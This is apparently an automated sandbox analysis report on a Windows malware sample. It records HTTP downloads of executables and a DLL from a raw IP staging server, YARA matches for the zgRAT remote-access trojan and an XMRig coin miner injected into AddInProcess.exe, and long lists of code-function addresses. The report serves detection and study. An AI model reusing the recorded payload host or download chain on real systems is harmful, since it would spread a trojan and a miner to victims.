Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: AddInProcess.exe, 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: AddInProcess.exe, 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: global traffic HTTP traffic detected: GET /file/1699834997-Prvrec.exe HTTP/1.1Host: 163.123.142.171:8080Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699835572-explorer.exe HTTP/1.1Host: 163.123.142.171:8080Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699833590-plugin3.dll HTTP/1.1Host: 163.123.142.171:8080

System Summary

barindex
Source: 9.2.xddtyli.exe.1eeb753d320.7.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eebf780000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eebf780000.13.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb753d320.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb73bd2b0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: e2kLb2J2Y7.exe, Dream.cs Large array initialization: Gzip: array initializer size 599332
Source: 9.2.xddtyli.exe.1eeb753d320.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eebf780000.13.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eebf780000.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb753d320.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb73bd2b0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD348B04F0 0_2_00007FFD348B04F0
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34971C24 0_2_00007FFD34971C24
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974106 0_2_00007FFD34974106
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD349736E4 0_2_00007FFD349736E4
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974344 0_2_00007FFD34974344
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34973C98 0_2_00007FFD34973C98
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD349732A2 0_2_00007FFD349732A2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974814 0_2_00007FFD34974814
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974964 0_2_00007FFD34974964
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A30128 0_2_00007FFD34A30128
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A38248 0_2_00007FFD34A38248
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3CFA1 0_2_00007FFD34A3CFA1
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A338F2 0_2_00007FFD34A338F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3B86D 0_2_00007FFD34A3B86D
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3B9F2 0_2_00007FFD34A3B9F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A315F2 0_2_00007FFD34A315F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3E651 0_2_00007FFD34A3E651
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3DE25 0_2_00007FFD34A3DE25
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A31589 0_2_00007FFD34A31589
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A34DD3 0_2_00007FFD34A34DD3
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A392F2 0_2_00007FFD34A392F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3E6FA 0_2_00007FFD34A3E6FA
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A393D3 0_2_00007FFD34A393D3
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3DFA8 0_2_00007FFD34A3DFA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348CB8FA 2_2_00007FFD348CB8FA
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34961D00 4_2_00007FFD34961D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349636E4 4_2_00007FFD349636E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349642E4 4_2_00007FFD349642E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34963C98 4_2_00007FFD34963C98
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34962C5D 4_2_00007FFD34962C5D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349632A2 4_2_00007FFD349632A2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34964A08 4_2_00007FFD34964A08
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21488 4_2_00007FFD34A21488
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2CA70 4_2_00007FFD34A2CA70
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E4F2 4_2_00007FFD34A2E4F2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2C0F8 4_2_00007FFD34A2C0F8
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2ACC9 4_2_00007FFD34A2ACC9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A28178 4_2_00007FFD34A28178
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A24D60 4_2_00007FFD34A24D60
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A24D68 4_2_00007FFD34A24D68
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2B1C5 4_2_00007FFD34A2B1C5
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A22EFD 4_2_00007FFD34A22EFD
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21290 4_2_00007FFD34A21290
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21270 4_2_00007FFD34A21270
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E2B0 4_2_00007FFD34A2E2B0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A212A0 4_2_00007FFD34A212A0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E3F2 4_2_00007FFD34A2E3F2
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34881B0F 9_2_00007FFD34881B0F
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883CD3 9_2_00007FFD34883CD3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD348842FB 9_2_00007FFD348842FB
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883AFB 9_2_00007FFD34883AFB
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34881736 9_2_00007FFD34881736
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883F25 9_2_00007FFD34883F25
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883758 9_2_00007FFD34883758
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883B78 9_2_00007FFD34883B78
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883B90 9_2_00007FFD34883B90
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD348837D3 9_2_00007FFD348837D3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883BD3 9_2_00007FFD34883BD3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34951B44 9_2_00007FFD34951B44
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953494 9_2_00007FFD34953494
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953574 9_2_00007FFD34953574
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953264 9_2_00007FFD34953264
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34951368 9_2_00007FFD34951368
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34952BA4 9_2_00007FFD34952BA4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD349930E9 10_2_00007FFD349930E9
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A61ED 12_2_00007FFD348A61ED
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A1A81 12_2_00007FFD348A1A81
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A542D 12_2_00007FFD348A542D
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6C54 12_2_00007FFD348A6C54
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A5846 12_2_00007FFD348A5846
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3CD3 12_2_00007FFD348A3CD3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A15C7 12_2_00007FFD348A15C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A62F9 12_2_00007FFD348A62F9
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3AFB 12_2_00007FFD348A3AFB
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A42FB 12_2_00007FFD348A42FB
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3F25 12_2_00007FFD348A3F25
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3758 12_2_00007FFD348A3758
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6348 12_2_00007FFD348A6348
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A625E 12_2_00007FFD348A625E
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6281 12_2_00007FFD348A6281
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A1AA0 12_2_00007FFD348A1AA0
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A62C7 12_2_00007FFD348A62C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3B78 12_2_00007FFD348A3B78
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6371 12_2_00007FFD348A6371
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3B90 12_2_00007FFD348A3B90
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A63A7 12_2_00007FFD348A63A7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A37D3 12_2_00007FFD348A37D3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3BD3 12_2_00007FFD348A3BD3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A63C7 12_2_00007FFD348A63C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34971C15 12_2_00007FFD34971C15
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970951 12_2_00007FFD34970951
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34973494 12_2_00007FFD34973494
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34973184 12_2_00007FFD34973184
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970804 12_2_00007FFD34970804
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970FE8 12_2_00007FFD34970FE8
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34971368 12_2_00007FFD34971368
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Code function: 17_2_00007FFD348C1C2D 17_2_00007FFD348C1C2D
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Code function: 17_2_00007FFD34981D00 17_2_00007FFD34981D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348B04F0 21_2_00007FFD348B04F0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348BC4A9 21_2_00007FFD348BC4A9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348BF93A 21_2_00007FFD348BF93A
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490806D 21_2_00007FFD3490806D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490FC52 21_2_00007FFD3490FC52
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349053D9 21_2_00007FFD349053D9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34901FD1 21_2_00007FFD34901FD1
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34901925 21_2_00007FFD34901925
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348FF751 21_2_00007FFD348FF751
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490AE7D 21_2_00007FFD3490AE7D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490EEA6 21_2_00007FFD3490EEA6
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348FF7D1 21_2_00007FFD348FF7D1
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34971D00 21_2_00007FFD34971D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34970F08 21_2_00007FFD34970F08
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349736E4 21_2_00007FFD349736E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349732A2 21_2_00007FFD349732A2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34970644 21_2_00007FFD34970644
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1810 22_2_00000001402F1810
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E780C 22_2_00000001402E780C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC07B 22_2_00000001402EC07B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC8B0 22_2_00000001402EC8B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EF8B0 22_2_00000001402EF8B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140307110 22_2_0000000140307110
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140306960 22_2_0000000140306960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F9190 22_2_00000001402F9190
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB991 22_2_00000001402EB991
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402FD9CE 22_2_00000001402FD9CE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EE9B0 22_2_00000001402EE9B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403021C0 22_2_00000001403021C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F7260 22_2_00000001402F7260
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E8A6A 22_2_00000001402E8A6A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EFAE0 22_2_00000001402EFAE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC30A 22_2_00000001402EC30A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F9320 22_2_00000001402F9320
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F6B50 22_2_00000001402F6B50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140303B40 22_2_0000000140303B40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140301330 22_2_0000000140301330
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEB6B 22_2_00000001402EEB6B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1BD0 22_2_00000001402F1BD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EF3E0 22_2_00000001402EF3E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403133B0 22_2_00000001403133B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC410 22_2_00000001402EC410
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403033F0 22_2_00000001403033F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F7460 22_2_00000001402F7460
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E7C60 22_2_00000001402E7C60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB440 22_2_00000001402EB440
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140313430 22_2_0000000140313430
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402ECD50 22_2_00000001402ECD50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140302D30 22_2_0000000140302D30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140311D70 22_2_0000000140311D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E75B0 22_2_00000001402E75B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E760F 22_2_00000001402E760F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEDFA 22_2_00000001402EEDFA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140305E40 22_2_0000000140305E40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1E70 22_2_00000001402F1E70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E6E70 22_2_00000001402E6E70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F66D0 22_2_00000001402F66D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402FBEB0 22_2_00000001402FBEB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EBEC0 22_2_00000001402EBEC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F2720 22_2_00000001402F2720
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140302710 22_2_0000000140302710
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F8EF0 22_2_00000001402F8EF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB6E1 22_2_00000001402EB6E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEF00 22_2_00000001402EEF00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402ECF80 22_2_00000001402ECF80
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402475E0 22_2_00000001402475E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014024D650 22_2_000000014024D650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140365C10 22_2_0000000140365C10
